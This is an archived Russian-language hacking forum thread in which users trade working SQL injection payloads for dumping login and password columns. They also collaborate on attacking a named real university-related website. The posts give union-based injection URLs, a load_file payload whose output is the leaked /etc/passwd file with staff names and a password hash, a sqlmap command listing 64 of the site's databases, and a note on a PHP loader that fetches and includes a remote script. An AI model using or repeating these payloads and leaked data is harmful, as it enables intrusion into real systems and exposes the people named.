ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.09.2018, 21:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Добрый вечер
как в таком запросе сделать ограничение на количество выводимых данных?
Код:
Code:
(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,login,0x3a,password))))x)
Когда большая бд, сайт ложится от попытки вывести все содержимое таблицы. |
|
|
|
28.09.2018, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от karkajoi
karkajoi said:
↑
Добрый вечер
как в таком запросе сделать ограничение на количество выводимых данных?
Код:
Code:
(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,login,0x3a,password))))x)
Когда большая бд, сайт ложится от попытки вывести все содержимое таблицы.
Код:
Code:
(select@ from(select@:=0x00,(select 1 from(select*from user order by userid ASC limit 0,100)w where(@:=concat(@,0x3c62723e,login,0x3a,password))))q)
Сам спросил , сам ответил. Збс
Может кому пригодится
|
|
|
|
29.09.2018, 14:43
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
|
|
|
30.09.2018, 22:49
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от man474019
man474019 said:
↑
Hi
I think it is not sql injection естественно, т.к. такой страницы нет
Код:
Code:
WHERE (link_oldlinks.url='forschung.htmladsadsa' OR link_oldlinks.url='forschung.htmladsadsa/')
Смущает только
Код:
Code:
Table 'crossroads_asia.link_oldlinks' doesn't exist
|
|
|
|
06.10.2018, 14:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
Что максимально можно извлечь из инекции в style="тут" разрешено '<>... без " ?
|
|
|
|
06.10.2018, 17:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
20604
Репутация:
18
|
|
Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?
Код:
Code:
http://www.mscnano.eu/news.php?id=132
|
|
|
|
06.10.2018, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от sepo
sepo said:
↑
Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?
Код:
Code:
http://www.mscnano.eu/news.php?id=132
Например так
Код:
Code:
http://www.mscnano.eu/news.php?id=z%27%20or%20mid(version(),1,1)=5%20and%20%272%27=%272
а вообще там union based
Код:
Code:
http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,@@version,5,6,user(),8--%20-
ну и тд
Код:
Code:
http://www.mscnano.eu/news.php?id=z%27%20union%20select%201,2,3,load_file(%27/etc/passwd%27),5,6,7,8--%20-
.SpoilerTarget" type="button">Spoiler: /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13roxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:107::/var/run/dbus:/bin/false avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:115ulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false saned:x:112:118::/home/saned:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false txomin:x:1000:1000:txomin,,,:/home/txomin:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin dipc:x:504:100onostia International Physics Center:/home/dipc:/bin/csh csic:x:505:100:Unidad de Fisica de Materiales:/home/csic:/bin/bash arubio:x:506:100:Angel Rubio:/home/arubio:/bin/bash ortega:x:507:100:Enrique Ortega:/home/ortega:/bin/csh ricardo:x:508:100:Ricardo Diez Muino:/home/ricardo:/bin/bash group:x:509:100:Echenique's Group:/home/group:/bin/csh seminars:x:510:100:Seminars:/home/seminars:/bin/csh papers:x:511:100apers:/home/papers:/bin/csh jgarcia:x:512:100:F. Javier Garcia de Abajo:/home/jgarcia:/bin/csh Echenique:x:513:100edro M. Echenique:/home/Echenique:/bin/csh aizpurua:x:517:517:Javier Aizpurua:/home/aizpurua:/bin/bash scsroast:x:518:100::/home/scsroast:/bin/csh inigo:x:529:100::/home/inigo:/bin/bash otzarreta:x:530:530::/home/otzarreta:/bin/bash gaudoin:x:532:532::/home/gaudoin:/bin/bash nanolab:x:533:533::/home/nanolab:/bin/bash nanotron:x:534:534::/home/nanotron:/bin/bash remi:x:535:535::/home/remi:/bin/bash digitalak:x:536:536::/home/digitalak:/bin/bash nano2006:x:537:537::/home/nano2006:/bin/bash aitzol:x:500:501:Aitzol Garcia Etxarri:/home/aitzol:/bin/bash waparpia:x:501:503:Andres Arnau:/home/waparpia:/bin/tcsh ftpdipc:x:538:538:Cuenta ftp:/home/ftpdipc:/bin/bash dedomulti:x:539:539::/home/dedomulti:/bin/bash eph2007:x:540:540::/home/eph2007:/bin/bash eltonjose:x:502:504:Elton Jose:/home/eltonjose:/bin/bash moodle:x:503:505:Usuario de moodle:/home/moodle:/bin/bash mscnano:x:523:506:Master Nanotecnologia:/home/mscnano:/bin/bash coronado:x:524:507:Alejandro Reyes Coronado:/home/coronado:/bin/bash mscnanointra:x:527:508::/home/mscnano/intranet:/bin/bash ssmeeting:x:543:509:ssmeeting:/home/ssmeeting:/bin/tcsh leskovsky:x:544:544::/home/leskovsky:/bin/bash einstein:x:545:545::/home/einstein:/bin/bash cerveny:x:514:502:Silvina Cerveny:/home/cerveny:/bin/bash schwartz:x:521:510:Gustavo Schwartz:/home/schwartz:/bin/bash frederiksen:x:526:511:Thomas Frederiksen:/home/frederiksen:/bin/bash webalianza:x:528:512::/home/webalianza:/bin/bash dipc10:x:541:513::/home/dipc10:/bin/bash eugene:x:542:514:Eugene Krasovskii:/home/eugene:/bin/bash metamorp:x:520:520::/home/metamorphose:/bin/bash spans:x:522:522::/home/spans:/bin/bash meeting:x:525:525::/home/meeting:/bin/bash Debian-exim:x:117:124::/var/spool/exim4:/bin/false mysql:x:116:123:MySQL Server,,,:/var/lib/mysql:/bin/false statd:x:118:65534::/var/lib/nfs:/bin/false nfo12:x:546:515:nfo12:/home/nfo12:/bin/bash mestizajes:x:547:516:Congreso Mestizajes:/home/mestizajes:/bin/bash ivo:x:548:519:Ivo Souza:/home/ivo:/bin/bash smmta:x:119:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:120:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false ossec:x:1001:1001::/var/ossec:/bin/false gosalvez:x:1002:1002::/home/gosalvez:/bin/bash nanophotonics:x:1003:1003:Grupo Javi Aizpurua,,,:/home/nanophotonics:/bin/bash garcialekue:x:1004:1004:Arantzazu Garcia Lekue,,,:/home/garcialekue:/bin/bash rakovich:x:1005:1005:Yury Rakovich:/home/rakovich:/bin/bash mesoscopics:x:1006:1006:Sebastian Bergeret,,,:/home/csic/mesoscopics:/bin/bash mblanco:x:1007:1007::/home/mblanco:/bin/bash QMC:$6$AuxQZxPT$aO5/vg51vWluEfCSmZGogvkptiH3SSqMqvj0SBKu0mq0gNg/Fx4ALtpV4zkn5k5Ne8HcqmEmNZNrjC3RoxTNT/:1008:1008::/home/QMC:/bin/sh iisc21:x:1009:1009:Congreso iisc21,,,:/home/iisc21:/bin/bash TJC:x:1010:1010ario Bercioux:/home/TJC:/bin/bash giedke:x:1011:1011:Geza Giedke:/home/giedke:/bin/bash maiagv:x:1012:1012:Maia Garcia Vergniory:/home/maiagv:/bin/bash trmme:x:1013:1013:Congreso Thomas Frederiksen:/home/trmme:/bin/bash internships:x:1014:1014:Responsable Thomas Frederiksen:/home/internships:/bin/bash fbarroso:x:1015:1015:Fabienne Barroso:/home/fbarroso:/bin/bash lsalassa:x:1016:1016:Luca Salassa:/home/lsalassa:/bin/bash tms17:x:1017:1017:Congreso tms17:/home/tms17:/bin/bash ecscd13:x:1018:1018:Confreso ecscd13:/home/ecscd13:/bin/bash magnon:x:1019:1019:Congreso magnon:/home/magnon:/bin/bash mole:x:1020:1020:Grupo Juanjo Saenz:/home/mole:/bin/bash nanoelectronics:x:1021:1021:Grupo Thomas Frederiksen:/home/nanoelectronics:/bin/bash nicolas:x:1022:1022::/home/dipc-courses:/bin/bash bondslam:x:1023:1023:Eduard Matito:/home/bondslam:/bin/bash colloquium:x:1024:1024:Web colloquium:/home/colloquium:/bin/bash tms:x:1025:1025:Congreso tms:/home/tms:/bin/bash qdp2018:x:1026:1026::/home/qdp2018:/bin/bash quantumdev:x:1027:1027::/home/quantumdev:/bin/bash daqm:x:1028:1028::/home/daqm:/bin/bash
ну шелл сами зальете))
|
|
|
|
22.10.2018, 12:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
2109
Репутация:
1
|
|
Сообщение от sepo
sepo said:
↑
Всем привет, нашел уязвимый сайт, но вот беда, ни ручками, ни скульмапом инъекцию раскрутить не могу. Есть тут желающии помочь?
Код:
Code:
http://www.mscnano.eu/news.php?id=132
Код:
Code:
python sqlmap.py -u "http://www.mscnano.eu/news.php?id=" --random-agent --hex --threads 1 --dbs --batch --dbms=mysql --technique=U --level 5 --risk 3 --tamper=space2comment,unmagicquotes,escapequotes,versionedkeywords
.SpoilerTarget" type="button">Spoiler: from sqlmap
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871, 0x775a5551695146647647515859656e61626e636765464348 7767764f4e56695a726557454457534a,0x71626b6271),NUL L#
---
available databases [64]:
[*] #mysql50#mysql.old.copia
[*] 2dspm
[*] 3s19
[*] bondslam
[*] cc
[*] cees
[*] cen2018
[*] computing_resources
[*] daqm
[*] dipc
[*] dipc-courses
[*] dipc10
[*] dynapeutics
[*] e2epol
[*] eezz18
[*] etsf
[*] iegr
[*] ii
[*] inelastica
[*] information_schema
[*] interfaces2014
[*] lankor_topa14
[*] leskovsky
[*] limage2018
[*] magnon
[*] modsurf
[*] mysql
[*] n2d
[*] nanoqi
[*] nanoqi16
[*] nanoqi17
[*] ngsces2018
[*] oss
[*] oss18
[*] pecas
[*] pecas2019
[*] pedro
[*] phpmyadmin
[*] polymorphs
[*] prueba
[*] qdp2018
[*] quantumchemphys
[*] quantumdev
[*] sabat2018
[*] scom16
[*] siqew2019
[*] sos2
[*] sos22
[*] test
[*] theobio17
[*] tms17
[*] tmspin
[*] topadipc
[*] topadipc2012
[*] topadipc2014
[*] topadipc2015
[*] topadipc2017
[*] topadipc2018
[*] topadipcOLD
[*] topostates
[*] totalenergy2020
[*] tstutorial
[*] webcc
[*] wikidb
Вся суть в том, что там стоит какой то фильтр, который сбрасывает соединения при "подозрительных запросах", тамперы в sqlmap помогают всё равно)
|
|
|
|
23.10.2018, 11:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
33324
Репутация:
0
|
|
как залиться через это
.SpoilerTarget" type="button">Spoiler - 100 ? 8 : 2;
- while( strlen($ff)");
- fclose($hdl);
- include("{$eb}.$algo");
- unlink("{$eb}.$algo");
- $npDcheckClassBgp = 'aue';
- }
|
|
|
|
23.10.2018, 12:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от jakonda1001
jakonda1001 said:
↑
как залиться через это Он тянет, сохраняет и инклудит вот этот http://linksferma.com/lnk/inj.php скрипт. Там уже понятнее, что к чему.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
